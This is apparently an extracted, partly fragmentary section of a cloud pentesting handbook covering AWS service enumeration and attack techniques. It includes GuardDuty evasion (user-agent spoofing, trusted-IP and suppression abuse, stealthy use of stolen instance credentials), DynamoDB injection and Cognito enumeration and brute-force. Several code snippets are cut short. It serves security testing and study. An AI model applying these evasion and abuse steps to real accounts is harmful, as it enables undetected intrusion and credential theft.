A log group has many streams. A stream has many events. And inside of
each stream, the events are guaranteed to be in order.
Actions
Enumeration
# Dashboards
aws cloudwatch list-dashboards
aws cloudwatch get-dashboard --dashboard-name <dashboard_name>
# Alarms
aws cloudwatch describe-alarms
aws cloudwatch describe-alarm-history
aws cloudwatch describe-alarms-for-metric --metric-name
<metric_name> --namespace <namespace>
aws cloudwatch describe-alarms-for-metric --metric-name
IncomingLogEvents --namespace AWS/Logs
# Anomaly Detections
aws cloudwatch describe-anomaly-detectors
aws cloudwatch describe-insight-rules
# Logs
aws logs tail "<log_group_name>" --follow
aws logs get-log-events --log-group-name "<log_group_name>" --
log-stream-name "<log_stream_name>" --output text >
<output_file>
# Events enumeration
aws events list-rules
aws events describe-rule --name <name>
aws events list-targets-by-rule --rule <name>
aws events list-archives
aws events describe-archive --archive-name <name>
aws events list-connections
aws events describe-connection --name <name>
aws events list-endpoints
aws events describe-endpoint --name <name>
aws events list-event-sources
aws events describe-event-source --name <name>
aws events list-replays
aws events list-api-destinations
aws events list-event-buses
Avoid Detection
event:ListRules ,
event:ListTargetsByRule ,
event:PutRule ,
event:RemoveTargets
GuardDuty populates its findings to Cloudwatch Events on a 5 minute
cadence. Modifying the Event pattern or Targets for an event may reduce
GuardDuty's ability to alert and trigger auto-remediation of findings,
especially where the remediation is triggered in a member account as
GuardDuty administrator protections do not extend to the Cloudwatch
events in the member account.
Functioning
When make changes, for example to security group or bucket access
control list —> fire off as an Event picked up by AWS Config
Stores everything in S3 bucket
Depending on the setup, as soon as something changes it could trigger
a lambda function OR schedule lambda function to periodically look
through the AWS Config settings
Lambda feeds back to Config
If rule has been broken, Config fires up an SNS
Config Rules
Config rules are a great way to help you enforce specific compliance
checks and controls across your resources, and allows you to adopt an
ideal deployment specification for each of your resource types. Each rule is
essentially a lambda function that when called upon evaluates the
resource and carries out some simple logic to determine the compliance
result with the rule. Each time a change is made to one of your supported
resources, AWS Config will check the compliance against any config
rules that you have in place.\ AWS have a number of predefined rules
that fall under the security umbrella that are ready to use. For example, Rds-
storage-encrypted. This checks whether storage encryption is activated by
your RDS database instances. Encrypted-volumes. This checks to see if any
EBS volumes that have an attached state are encrypted.
AWS Managed rules: Set of predefined rules that cover a lot of best
practices, so it's always worth browsing these rules first before setting
up your own as there is a chance that the rule may already exist.
Custom rules: You can create your own rules to check specific
customconfigurations.
Limit of 50 config rules per region before you need to contact AWS for an
increase.\ Non compliant results are NOT deleted.
Budgets
Budgets help to manage costs and usage. You can get alerted when a
threshold is reached.\ Also, they can be used for non cost related
monitoring like the usage of a service (how many GB are used in a
particular S3 bucket?).
It can group and protect specific resources together, for example, all
resources with a particular tag or all of your CloudFront distributions. One
key benefit of Firewall Manager is that it automatically protects certain
resources that are added to your account as they become active.
Finding summary:
Finding type
Severity: 7-8.9High, 4-6.9Medium, 01-3.9Low
Region
Account ID
Resource ID
Time of detection
Which threat list was used
Resource affected
Action
Actor: Ip address, port and domain
Additional Information
You pay for the processing of your log files, per 1 million events per
months from CloudTrail and per GB of analysed logs from VPC Flow
guardduty:ListDetectors ,
guardduty:ListIPSet ,
iam:PutRolePolicy ,
( guardduty:CreateIPSet | guardduty:U
pdateIPSet )
An attacker could create or update GuardDuty's Trusted IP list, including
their own IP on the list. Any IPs in a trusted IP list will not have any
Cloudtrail or VPC flow log alerts raised against them.
guardduty:CreateFilter
Newly create GuardDuty findings can be automatically archived via
Suppression Rules. An adversary could use filters to automatically
archive findings they are likely to generate.
guardduty:DeletePublishingDestinat
ion
An adversary could disable alerting simply by deleting the destination of
alerts.
Pentest Findings
OS's GuardDuty detect AWS API requests from common penetration
testingthis and trigger a PenTest Finding. It's detected by the user agent
name that is passed in the API request.\ Therefore, modifying the user
agent it's possible to prevent GuardDuty from detecting the attack.
Using OS like Ubuntu, Mac or Windows will prevent this alert from
triggering.
To prevent this you can search from the script session.py in the
botocore package. In Kali Linux it's in
/usr/local/lib/python3.7/dist-packages/botocore/session.py .
If you need to connect through Tor you can bypass this using Bridges. But
obviously it would be better if you just don't use Tor at all to connect.
To use a bridge you an use Obfs4 ( apt install tor obfs4proxy ) and get
a bridge address from bridges.torproject.org.
From here, cre ate a torrc file with something similar to:
UseBridges 1
Bridge obfs4 <IP ADDRESS>:<PORT> <FINGERPRINT> cert=
<cert_string> iat-mode=0
ClientTransportPlugin obfs4 exec /bin/obfs4proxy
Fun tor -f torrc and you can connect to the regular socks5 proxy on
port 9050.
Credential Exfiltration Detection
If you steals EC2 creds from the metadata service and uses them outside
AWS infrastructure the alert
UnauthorizedAccess:IAMUser/InstanceCredentialExfiltration.OutsideAWS
is triggered.
Moreover, if you use your own EC2 instance to use the stolen credentials
the alert
UnauthorizedAccess:IAMUser/InstanceCredentialExfiltration.InsideAWS is
triggered.
Another way to bypass this alert is to simple use stolen credentials in the
same machine they were stolen or in one from the same account.
References
https://hackingthe.cloud/aws/avoiding-detection/guardduty-pentest/
https://hackingthe.cloud/aws/avoiding-detection/guardduty-tor-client/
https://hackingthe.cloud/aws/avoiding-detection/modify-guardduty-
config/
https://hackingthe.cloud/aws/avoiding-detection/steal-keys-undetected/
These are the tests that AWS Inspector allow you to perform:
CVEs
CIS Benchmarks
Security Best practices
Network Reachability
You can make any of those run on the EC2 machines you decide.
Rule package: Contains a number of individual rules that are check against
an EC2 when an assessment is run. Each one also have a severity (high,
medium, low, informational). The possibilities are:
Once you have configured the Amazon Inspector Role, the AWS Agents are
Installed, the target is configured and the template is configured, you will be
able to run it. An assessment run can be stopped, resumed, or deleted.
Note that nowadays AWS already allow you to autocreate all the necesary
configurations and even automatically install the agents inside the EC2
instances.
Reporting
Telemetry: data that is collected from an instance, detailing its
configuration, behavior and processes during an assessment run. Once
collected, the data is then sent back to Amazon Inspector in near-real-time
over TLS where it is then stored and encrypted on S3 via an ephemeral
KMS key. Amazon Inspector then accesses the S3 Bucket, decrypts the data
in memory, and analyzes it against any rules packages used for that
assessment to generate the findings.
Assessment Report: Provide details on what was assessed and the results
of the assessment.
This is useful to avoid data leaks as Macie will detect if you are exposing
people information to the Internet.
Anonymized access
Config compliance
Credential Loss
Data compliance
Files hosting
Identity enumeration
Information loss
Location anomaly
Open permissions
Privilege escalation
Ransomware
Service disruption
Suspicious access
Dashboard categorization:
Identity types:
The final risk of a file will be the highest risk found between those 4
categories
The research function allows to create you own queries again all Amazon
Macie data and perform a deep dive analysis of the data. You can filter
results based on: CloudTrail Data, S3 Bucket properties and S3 Objects
Characteristics
The full power and potential of AWS Trusted Advisor is only really
available if you have a business or enterprise support plan with AWS.
Without either of these plans, then you will only have access to six core
checks that are freely available to everyone. These free core checks are split
between the performance and security categories, with the majority of them
being related to security. These are the 6 checks: service limits, Security
Groups Specific Ports Unrestricted, Amazon EBS Public Snapshots,
Amazon RDS Public Snapshots, IAM Use, and MFA on root account.\
Trusted advisor can send notifications and you can exclude items from it.\
Trusted advisor data is automatically refreshed every 24 hours, but you
can perform a manual one 5 mins after the previous one.
Checks
CategoriesCore
1. Cost Optimization
2. Security
3. Fault Tolerance
4. Performance
5. Service Limits
6. S3 Bucket Permissions
Core Checks
1. Security Groups - Specific Ports Unrestricted
2. IAM Use
3. MFA on Root Account
4. EBS Public Snapshots
5. RDS Public Snapshots
6. Service Limits
Security Checks
Security group open access to specific high-risk ports
Security group unrestricted access
Open write and List access to S3 buckets
MFA on root account
Overly permissive RDS security group
Use of cloudtrail
Route 53 MX records have SPF records
ELB with poor or missing HTTPS config
ELB security groups missing or overly permissive
CloudFront cert checks - expired, weak, misconfigured
IAM access keys not rotated in last 90 days
Exposed access keys on GitHub etc
Public EBS or RDS snapshots
Missing or weak IAM password policy
References
https://cloudsecdocs.com/aws/services/logging/other/#trusted-advisor
Conditions
Conditions allow you to specify what elements of the incoming HTTP or
HTTPS request you want WAF to be monitoring (XSS, GEO - filtering
by location-, IP address, Size constraints, SQL Injection attacks, strings and
regex matching). Note that if you are restricting a country from cloudfront,
this request won't arrive to the waf.
You can have 100 conditions of each type, such as Geo Match or size
constraints, however Regex is the exception to this rule where only 10
Regex conditions are allowed but this limit is possible to increase. You are
able to have 100 rules and 50 Web ACLs per AWS account. You are
limited to 5 rate-based-rules per account. Finally you can have 10,000
requests per second when using WAF within your application load
balancer.
Rules
Using these conditions you can create rules: For example, block request if 2
conditions are met.\ When creating your rule you will be asked to select a
Rule Type: Regular Rule or Rate-Based Rule.
The only difference between a rate-based rule and a regular rule is that
rate-based rules count the number of requests that are being received
from a particular IP address over a time period of five minutes.
When you select a rate-based rule option, you are asked to enter the
maximum number of requests from a single IP within a five minute
time frame. When the count limit is reached, all other requests from that
same IP address is then blocked. If the request rate falls back below the
rate limit specified the traffic is then allowed to pass through and is no
longer blocked. When setting your rate limit it must be set to a value
above 2000. Any request under this limit is considered a Regular Rule.
Actions
An action is applied to each rule, these actions can either be Allow, Block
or Count.
If an incoming request does not meet any rule within the Web ACL then
the request takes the action associated to a default action specified which
can either be Allow or Block. An important point to make about these rules
is that they are executed in the order that they are listed within a Web
ACL. So be careful to architect this order correctly for your rule base,
typically these are ordered as shown:
CloudWatch
WAF CloudWatch metrics are reported in one minute intervals by default
and are kept for a two week period. The metrics monitored are
AllowedRequests, BlockedRequests, CountedRequests, and
PassedRequests.
DynamoDB
Redshift
DocumentDB
Relational Database (RDS)
Enumeration
# Tables
aws dynamodb list-tables
aws dynamodb describe-table --table-name <t_name> #Get metadata
info
## The primary key and sort key will appear inside the
KeySchema field
## Read
aws dynamodb scan --table-name <t_name> #Get data inside the
table
aws dynamodb query \ #Query against the table
--table-name MusicCollection \
--projection-expression "SongTitle" \
--key-condition-expression "Artist = :v1" \
--expression-attribute-values file://expression-
attributes.json \
--return-consumed-capacity TOTAL
# Backups
aws dynamodb list-backups
aws dynamodb describe-backup --backup-arn <arn>
aws --profile prd dynamodb describe-continuous-backups --table-
name <t_name>
# Global tables
aws dynamodb list-global-tables
aws dynamodb describe-global-table --global-table-name <name>
# Exports
aws dynamodb list-exports
aws --profile prd dynamodb describe-export --export-arn <arn>
# Misc
aws dynamodb describe-endpoints #Dynamodb endpoints
GUI
There is a GUI for local Dynamo services like DynamoDB Local, dynalite,
localstack, etc, that could be useful:
https://github.com/aaronshaf/dynamodb-admin
Privesc
aws-dynamodb-privesc.md
DynamoDB Injection
SQL Injection
There are ways to access DynamoDB data with SQL syntax, therefore,
typical SQL injections are also possible.
https://book.hacktricks.xyz/pentesting-web/sql-injection
NoSQL Injection
In DynamoDB different conditions can be used to retrieve data, like in a
common NoSQL Injection if it's possible to chain more conditions to
retrieve data you could obtain hidden data (or dump the whole table).\ You
can find here the conditions supported by DynamoDB:
https://docs.aws.amazon.com/amazondynamodb/latest/APIReference/API_
Condition.html, note that different conditions are supported if the data is
being accessed via query or via scan .
If you can change the comparison performed or add new ones, you could
retrieve more data.
fix the "EQ" condition searching for the ID 1000 and then looking for all
the data with a Id string greater and 0, which is all.
:property Injection
Some SDKs allows to use a string indicating the filtering to be performed
like:
new
ScanSpec().withProjectionExpression("UserName").withFilterExpre
ssion(user_input+" = :value and Password =
:password").withValueMap(valueMap)
You need to know that searching in DynamoDB for substituting an
attribute value in filter expressions while scanning the items, the tokens
should begin with the : character. Such tokens will be replaced with actual
attribute value at runtime.
Therefore, a login like the previous one can be bypassed with something
like:
Encryption for your cluster can only happen during its creation, and once
encrypted, the data, metadata, and any snapshots are also encrypted. The
tiering level of encryption keys are as follows, tier one is the master key,
tier two is the cluster encryption key, the CEK, tier three, the database
encryption key, the DEK, and finally tier four, the data encryption keys
themselves.
KMS
During the creation of your cluster, you can either select the default KMS
key for Redshift or select your own CMK, which gives you more flexibility
over the control of the key, specifically from an auditable perspective.
The default KMS key for Redshift is automatically created by Redshift the
first time the key option is selected and used, and it is fully managed by
AWS.
This KMS key is then encrypted with the CMK master key, tier one. This
encrypted KMS data key is then used as the cluster encryption key, the
CEK, tier two. This CEK is then sent by KMS to Redshift where it is stored
separately from the cluster. Redshift then sends this encrypted CEK to the
cluster over a secure channel where it is stored in memory.
Redshift then requests KMS to decrypt the CEK, tier two. This decrypted
CEK is then also stored in memory. Redshift then creates a random
database encryption key, the DEK, tier three, and loads that into the
memory of the cluster. The decrypted CEK in memory then encrypts the
DEK, which is also stored in memory.
This encrypted DEK is then sent over a secure channel and stored in
Redshift separately from the cluster. Both the CEK and the DEK are now
stored in memory of the cluster both in an encrypted and decrypted form.
The decrypted DEK is then used to encrypt data keys, tier four, that are
randomly generated by Redshift for each data block in the database.
You can use AWS Trusted Advisor to monitor the configuration of your
Amazon S3 buckets and ensure that bucket logging is enabled, which can
be useful for performing security audits and tracking usage patterns in S3.
CloudHSM
Using Redshift with CloudHSM
When working with CloudHSM to perform your encryption, firstly you
must set up a trusted connection between your HSM client and Redshift
while using client and server certificates.
You must then configure Redshift with the following details of your HSM
client: the HSM IP address, the HSM partition name, the HSM partition
password, and the public HSM server certificate, which is encrypted by
CloudHSM using an internal master key. Once this information has been
provided, Redshift will confirm and verify that it can connect and access
development partition.
During the rotation, Redshift will rotate the CEK for your cluster and for
any backups of that cluster. It will rotate a DEK for the cluster but it's not
possible to rotate a DEK for the snapshots stored in S3 that have been
encrypted using the DEK. It will put the cluster into a state of 'rotating keys'
until the process is completed when the status will return to 'available'.
Enumeration
# Get clusters
aws redshift describe-clusters
## Get if publicly accessible
aws redshift describe-clusters | jq -r
".Clusters[].PubliclyAccessible"
## Get DB username to login
aws redshift describe-clusters | jq -r
".Clusters[].MasterUsername"
## Get endpoint
aws redshift describe-clusters | jq -r ".Clusters[].Endpoint"
## Public addresses of the nodes
aws redshift describe-clusters | jq -r
".Clusters[].ClusterNodes[].PublicIPAddress"
## Get IAM roles of the clusters
aws redshift describe-clusters | jq -r ".Clusters[].IamRoles"
# Get credentials
aws redshift get-cluster-credentials --db-user <username> --
cluster-identifier <cluster-id>
## By default, the temporary credentials expire in 900 seconds.
You can optionally specify a duration between 900 seconds (15
minutes) and 3600 seconds (60 minutes).
aws redshift get-cluster-credentials-with-iam --cluster-
identifier <cluster-id>
## Gives creds to access redshift with the IAM redshift
permissions given to the current AWS account
## More in
https://docs.aws.amazon.com/redshift/latest/mgmt/redshift-iam-
access-control-identity-based.html
# Authentication profiles
aws redshift describe-authentication-profiles
# Snapshots
aws redshift describe-cluster-snapshots
# Scheduled actions
aws redshift describe-scheduled-actions
# Connect
# The redshift instance must be publicly available (not by
default), the sg need to allow inbounds connections to the port
and you need creds
psql -h redshift-cluster-1.sdflju3jdfkfg.us-east-
1.redshift.amazonaws.com -U admin -d dev -p 5439
Privesc
aws-redshift-privesc.md
Persistence
The following actions allow to grant access to other AWS accounts to the
cluster:
authorize-endpoint-access
authorize-snapshot-access
Enumeration
# Parameter groups
aws docdb describe-db-cluster-parameter-groups
aws docdb describe-db-cluster-parameters --db-cluster-
parameter-group-name <param_group_name>
# Snapshots
aws docdb describe-db-cluster-snapshots
aws --region us-east-1 --profile ad docdb describe-db-cluster-
snapshot-attributes --db-cluster-snapshot-identifier <snap_id>
NoSQL Injection
As DocumentDB is a MongoDB compatible database, you can imagine it's
also vulnerable to common NoSQL injection attacks:
https://book.hacktricks.xyz/pentesting-web/nosql-injection
DocumentDB
aws-documentdb-enum.md
RDS
RDS allows you to set up a relational database using a number of
different engines such as MySQL, Oracle, SQL Server, PostgreSQL, etc.
During the creation of your RDS database instance, you have the
opportunity to Enable Encryption at the Configure Advanced Settings
screen under Database Options and Enable Encryption.
By enabling your encryption here, you are enabling encryption at rest for
your storage, snapshots, read replicas and your back-ups. Keys to
manage this encryption can be issued by using KMS. It's not possible to
add this level of encryption after your database has been created. It has to
be done during its creation.
If you want to use the TDE method, then you must first ensure that the
database is associated to an option group. Option groups provide default
settings for your database and help with management which includes some
security features. However, option groups only exist for the following
database engines and versions.
Once the database is associated with an option group, you must ensure that
the Oracle Transparent Data Encryption option is added to that group. Once
this TDE option has been added to the option group, it cannot be removed.
TDE can use two different encryption modes, firstly, TDE tablespace
encryption which encrypts entire tables and, secondly, TDE column
encryption which just encrypts individual elements of the database.
Enumeration
# Get DBs
aws rds describe-db-clusters
aws rds describe-db-cluster-endpoints
aws rds describe-db-instances
aws rds describe-db-security-groups
# Find snapshots
aws rds describe-db-snapshots
aws rds describe-db-snapshots --include-public --snapshot-type
public
## Restore snapshot as new instance
aws rds restore-db-instance-from-db-snapshot --db-instance-
identifier <ID> --db-snapshot-identifier <ID> --availability-
zone us-west-2a
# Proxies
aws rds describe-db-proxy-endpoints
aws rds describe-db-proxy-target-groups
aws rds describe-db-proxy-targets
Privesc
aws-rds-privesc.md
Unauthenticated Access
aws-rds-unauthenticated-enum.md
SQL Injection
There are ways to access DynamoDB data with SQL syntax, therefore,
typical SQL injections are also possible.
https://book.hacktricks.xyz/pentesting-web/sql-injection
Enumeration
# Generic info
aws apigateway get-account
aws apigateway get-domain-names
aws apigateway get-usage-plans
aws apigateway get-vpc-links
aws apigateway get-client-certificates
# Enumerate APIs
aws apigateway get-rest-apis
## Get stages
aws apigateway get-stages --rest-api-id <id>
## Get resources
aws apigateway get-resources --rest-api-id <id>
## Get API resource action per HTTP verb
aws apigateway get-method --http-method GET --rest-api-id <api-
id> --resource-id <resource-id>
## Call API
https://<api-id>.execute-api.
<region>.amazonaws.com/<stage>/<resource>
## API authorizers
aws apigateway get-authorizers --rest-api-id <id>
## Models
aws apigateway get-models --rest-api-id <id>
## More info
aws apigateway get-gateway-responses --rest-api-id <id>
aws apigateway get-request-validators --rest-api-id <id>
aws apigateway get-deployments --rest-api-id <id>
You will note that an API is expecting an IAM authorised token because it
will send the response
One easy way to generate the expected token by the application is to use the
Authorization type AWS Signature inside Postman.
Set the accessKey and the SecretKey of the account you want to use and
you can know authenticate against the API endpoint.
AWS4-HMAC-SHA256 Credential=AKIAYY7XU6ECUDOTWB7W/20220726/us-
east-1/execute-api/aws4_request, SignedHeaders=host;x-amz-date,
Signature=9f35579fa85c0d089c5a939e3d711362e92641e8c14cc571df8c7
1b4bc62a5c2
Note that in other cases the Authorizer might have been bad coded and
just sending anything inside the Authorization header will allow to see
the hidden content.
The API Key just need to be included inside a HTTP header called x-
api-key .
Privesc
aws-apigateway-privesc.md
Unauthenticated Access
aws-api-gateway-unauthenticated-enum.md
Enumeration
# Stacks
aws cloudformation list-stacks
aws cloudformation describe-stacks # You could find sensitive
information here
aws cloudformation list-stack-resources --stack-name <name>
# Export
aws cloudformation list-exports
aws cloudformation list-imports --export-name <x_name>
# Stack Sets
aws cloudformation list-stack-sets
aws cloudformation describe-stack-set --stack-set-name <name>
aws cloudformation list-stack-instances --stack-set-name <name>
aws cloudformation list-stack-set-operations --stack-set-name
<name>
aws cloudformation list-stack-set-operation-results --stack-
set-name <name> --operation-id <id>
Privesc
In the following page you can check how to abuse cloudformation
permissions to escalate privileges:
aws-cloudformation-privesc
Post-Exploitation
Check for secrets or sensitive information in the template, parameters &
output of each CloudFormation
Codestar
AWS CodeStar is a service for creating, managing, and working with
software development projects on AWS. You can quickly develop, build,
and deploy applications on AWS with an AWS CodeStar project. An AWS
CodeStar project creates and integrates AWS services for your project
development toolchain. Depending on your choice of AWS CodeStar
project template, that toolchain might include source control, build,
deployment, virtual servers or serverless resources, and more. AWS
CodeStar also manages the permissions required for project users
(called team members).
Enumeration
Privesc
In the following page you can check how to abuse codestar permissions to
escalate privileges:
aws-codestar-privesc
Since this is a physical device dedicated to you, the keys are stored on the
device. Keys need to either be replicated to another device, backed up to
offline storage, or exported to a standby appliance. This device is not
backed by S3 or any other service at AWS like KMS.
CloudHSM is an enterprise class service for secured key storage and can
be used as a root of trust for an enterprise. It can store private keys in
PKI and certificate authority keys in X509 implementations. In addition to
symmetric keys used in symmetric algorithms such as AES, KMS stores
and physically protects symmetric keys only (cannot act as a certificate
authority), so if you need to store PKI and CA keys a CloudHSM or two or
three could be your solution.
With CloudHSM only you have access to the keys and without going into
too much detail, with CloudHSM you manage your own keys. With KMS,
you and Amazon co-manage your keys. AWS does have many policy
safeguards against abuse and still cannot access your keys in either
solution. The main distinction is compliance as it pertains to key ownership
and management, and with CloudHSM, this is a hardware appliance that
you manage and maintain with exclusive access to you and only you.
CloudHSM Suggestions
1. Always deploy CloudHSM in an HA setup with at least two
appliances in separate availability zones, and if possible, deploy a
third either on premise or in another region at AWS.
2. Be careful when initializing a CloudHSM. This action will destroy
the keys, so either have another copy of the keys or be absolutely sure
you do not and never, ever will need these keys to decrypt any data.
3. CloudHSM only supports certain versions of firmware and
software. Before performing any update, make sure the firmware and
or software is supported by AWS. You can always contact AWS
support to verify if the upgrade guide is unclear.
4. The network configuration should never be changed. Remember,
it's in a AWS data center and AWS is monitoring base hardware for
you. This means that if the hardware fails, they will replace it for you,
but only if they know it failed.
5. The SysLog forward should not be removed or changed. You can
always add a SysLog forwarder to direct the logs to your own
collection tool.
6. The SNMP configuration has the same basic restrictions as the
network and SysLog folder. This should not be changed or removed.
An additional SNMP configuration is fine, just make sure you do not
change the one that is already on the appliance.
7. Another interesting best practice from AWS is not to change the NTP
configuration. It is not clear what would happen if you did, so keep in
mind that if you don't use the same NTP configuration for the rest of
your solution then you could have two time sources. Just be aware of
this and know that the CloudHSM has to stay with the existing NTP
source.
The initial launch charge for CloudHSM is $5,000 to allocate the hardware
appliance dedicated for your use, then there is an hourly charge associated
with running CloudHSM that is currently at $1.88 per hour of operation, or
approximately $1,373 per month.
Enumeration
The log files capture data over a period of time and depending on the
amount of requests that are received by Amazon CloudFront for that
distribution will depend on the amount of log fils that are generated. It's
important to know that these log files are not created or written to on S3. S3
is simply where they are delivered to once the log file is full. Amazon
CloudFront retains these logs until they are ready to be delivered to S3.
Again, depending on the size of these log files this delivery can take
between one and 24 hours.
Functions
You can create functions in CloudFront. These functions will have its
endpoint in cloudfront defined and will run a declared NodeJS code. This
code will run inside a sandbox in a machine running under an AWS
managed machine (you would need a sandbox bypass to manage to escape
to the underlaying OS).
As the functions aren't run in the users AWS account. no IAM role is
attached so no direct privesc is possible abusing this feature.
Enumeration
The two main components of Amazon Cognito are user pools and identity
pools. User pools are user directories that provide sign-up and sign-in
options for your app users. Identity pools enable you to grant your users
access to other AWS services.
User pools
To learn what is a Cognito User Pool check:
cognito-user-pools.md
Identity pools
The learn what is a Cognito Identity Pool check:
cognito-identity-pools.md
Enumeration
# List Identity Pools
aws cognito-identity list-identity-pools --max-results 60
aws cognito-identity describe-identity-pool --identity-pool-id
"eu-west-2:38b294756-2578-8246-9074-5367fc9f5367"
aws cognito-identity list-identities --identity-pool-id "eu-
west-2:38b294756-2578-8246-9074-5367fc9f5367" --max-results 60
aws cognito-identity get-identity-pool-roles --identity-pool-id
"eu-west-2:38b294756-2578-8246-9074-5367fc9f5367"
# Get credentials
## Get one ID
aws cognito-identity get-id --identity-pool-id "eu-west-
2:38b294756-2578-8246-9074-5367fc9f5367"
## Get creds for that id
aws cognito-identity get-credentials-for-identity --identity-id
"eu-west-2:195f9c73-4789-4bb4-4376-99819b6928374" [--logins
...] # Use logins to get the authenticated user IAM role
aws cognito-identity get-open-id-token --identity-id "eu-west-
2:195f9c73-4789-4bb4-4376-99819b6928374"
# User Pools
## Get pools
aws cognito-idp list-user-pools --max-results 60
## Get users
aws cognito-idp list-users --user-pool-id <user-pool-id>
## Get groups
aws cognito-idp list-groups --user-pool-id <user-pool-id>
## Get users in a group
aws cognito-idp list-users-in-group --user-pool-id <user-pool-
id> --group-name <group-name>
## List App IDs of a user pool
aws cognito-idp list-user-pool-clients --user-pool-id <user-
pool-id>
## List configured identity providers for a user pool
aws cognito-idp list-identity-providers --user-pool-id <user-
poo
## List user import jobs
aws cognito-idp list-user-import-jobs --user-pool-id <user-
pool-id> --max-results 60
## Get MFA config of a user pool
aws cognito-idp get-user-pool-mfa-config --user-pool-id <user-
pool-id>
region = "us-east-1"
id_pool_id = 'eu-west-1:098e5341-8364-038d-16de-1865e435da3b'
url = f'https://cognito-identity.{region}.amazonaws.com/'
headers = {"X-Amz-Target": "AWSCognitoIdentityService.GetId",
"Content-Type": "application/x-amz-json-1.1"}
params = {'IdentityPoolId': id_pool_id}
IdentityId = r.json()["IdentityId"]
headers["X-Amz-Target"] =
"AWSCognitoIdentityService.GetCredentialsForIdentity"
r = requests.post(url, json=params, headers=headers)
print(r.json())
Having a set of IAM credentials you should check which access you have
and try to escalate privileges.
Authenticated
There could also be roles available for authenticated users accessing the
Identity Pool.
For this you might need to have access to the identity provider. If that is a
Cognito User Pool, maybe you can abuse the default behaviour and create
a new user yourself.
Anyway, the following example expects that you have already logged in
inside a Cognito User Pool used to access the Identity Pool (don't forget
that other types of identity providers could also be configured).
Source code of applications will usually also contain the user pool ID and
the client application ID, (and some times the application secret?) which
are needed for a user to login to a Cognito User Pool.
Potential attacks
Registration: By default a user can register himself, so he could create
a user for himself.
User enumeration: The registration functionality can be used to find
usernames that already exists. This information can be useful for the
brute-force attack.
Login brute-force: In the Authentication section you have all the
methods that a user have to login, you could try to brute-force them
find valid credentials.
Registration
User Pools allows by default to register new users.
You can provide the needed details with a JSON such as:
You could use this functionality also to enumerate existing users. This is
the error message when a user already exists with that name:
An error occurred (UsernameExistsException) when calling the
SignUp operation: User already exists
Note in the previous command how the custom attributes start with
"custom:".\ Also know that when registering you cannot create for the
user new custom attributes. You can only give value to default attributes
(even if they aren't required) and custom attributes specified.
Or just to test if a client id exists. This is the error if the client-id doesn't
exist:
Verifying Registration
Cognito allows to verify a new user by verifying his email or phone
number. Therefore, when creating a user usually you will be required at
least the username and password and the email and/or telephone number.
Just set one you control so you will receive the code to verify your newly
created user account like this:
Even if looks like you can use the same email and phone number, when
you need to verify the created user Cognito will complain about using the
same info and won't let you verify the account.
You won't be able to login with email or phone number until you verify
them, but you will be able to login with the username.\ Note that even if
the email was modified and not verified it will appear in the ID Token
inside the email field and the filed email_verified will be false, but if
the app isn't checking that you might impersonate other users.
Moreover, note that you can put anything inside the name field just
modifying the name attribute. If an app is checking that field for some
reason instead of the email (or any other attribute) you might be able to
impersonate other users.
Anyway, if for some reason you changed your email for example to a new
one you can access you can confirm the email with the code you received
in that email address:
Recover/Change Password
It's possible to recover a password just knowing the username (or email or
phone is accepted) and having access to it as a code will be sent there:
ADMIN_NO_SRP_AUTH &
ADMIN_USER_PASSWORD_AUTH
This is the server side authentication flow:
user pool id
client id
username
password
client secret (only if the app is configured to use a secret)
In order to be able to login with this method that application must allow to
login with ALLOW_ADMIN_USER_PASSWORD_AUTH .\ Moreover, to perform this
action you need credentials with the permissions cognito-
Code to Login
import boto3
import botocore
import hmac
import hashlib
import base64
client_id = "<client-id>"
user_pool_id = "<user-pool-id>"
client_secret = "<client-secret>"
username = "<username>"
password = "<pwd>"
USER_PASSWORD_AUTH
This method is another simple and traditional user & password
authentication flow. It's recommended to migrate a traditional
authentication method to Cognito and recommended to then disable it and
use then ALLOW_USER_SRP_AUTH method instead (as that one never
sends the password over the network).\ This method is NOT enabled by
default.
The main difference with the previous auth method inside the code is that
you don't need to know the user pool ID and that you don't need extra
permissions in the Cognito User Pool.
client id
username
password
client secret (only if the app is configured to use a secret)
In order to be able to login with this method that application must allow to
login with ALLOW_USER_PASSWORD_AUTH.
client_id = "<client-id>"
user_pool_id = "<user-pool-id>"
client_secret = "<client-secret>"
username = "<username>"
password = "<pwd>"
USER_SRP_AUTH
This is scenario is similar to the previous one but instead of of sending the
password through the network to login a challenge authentication is
performed (so no password navigating even encrypted through he net).\
This method is enabled by default.
user pool id
client id
username
password
client secret (only if the app is configured to use a secret)
Code to login
from warrant.aws_srp import AWSSRP
import os
USERNAME='xxx'
PASSWORD='yyy'
POOL_ID='us-east-1_zzzzz'
CLIENT_ID = '12xxxxxxxxxxxxxxxxxxxxxxx'
CLIENT_SECRET = 'secreeeeet'
os.environ["AWS_DEFAULT_REGION"] = "<region>"
REFRESH_TOKEN_AUTH &
REFRESH_TOKEN
This method is always going to be valid (it cannot be disabled) but you
need to have a valid refresh token.
import boto3
import botocore
import hmac
import hashlib
import base64
client_id = "<client-id>"
token = '<token>'
boto_client = boto3.client('cognito-idp',
region_name='<region>')
print(refresh(client_id, token))
CUSTOM_AUTH
In this case the authentication is going to be performed through the
execution of a lambda function.
Extra Security
Advanced Security
By default it's disabled, but if enabled, Cognito could be able to find
account takeovers. To minimise the probability you should login from a
network inside the same city, using the same user agent (and IP is thats
possible).
TODO: Find how to get AWS credentials of the role/s assigned to the user
of the User Pool (if you know how to do this send a PR please)
Enumeration
Privesc
In the following page you can check how to abuse datapipeline
permissions to escalate privileges:
aws-datapipeline-privesc.md
CodePipeline
AWS CodePipeline is a fully managed continuous delivery service that
helps you automate your release pipelines for fast and reliable application
and infrastructure updates. CodePipeline automates the build, test, and
deploy phases of your release process every time there is a code change,
based on the release model you define.
Enumeration
Privesc
In the following page you can check how to abuse codepipeline
permissions to escalate privileges:
aws-codepipeline-privesc.md
CodeBuild
AWS CodeBuild is a fully managed continuous integration service that
compiles source code, runs tests, and produces software packages that
are ready to deploy. With CodeBuild, you don’t need to provision,
manage, and scale your own build servers.
Enumeration
# Projects
aws codebuild list-shared-projects
aws codebuild list-projects
aws codebuild batch-get-projects --names <project_name> #Check
for creds in env vars
# Builds
aws codebuild list-builds
aws codebuild list-builds-for-project --project-name <p_name>
# Reports
aws codebuild list-reports
aws codebuild describe-test-cases --report-arn <ARN>
Privesc
In the following page you can check how to abuse codebuild permissions
to escalate privileges:
aws-codebuild-privesc.md
CodeCommit
It is a version control service, which is hosted and fully managed by
Amazon, which can be used to privately store data (documents, binary files,
source code) and manage them in the cloud.
It eliminates the requirement for the user to know Git and manage their
own source control system or worry about scaling up or down their
infrastructure. Codecommit supports all the standard functionalities that
can be found in Git, which means it works effortlessly with user’s current
Git-based tools.
Enumeration
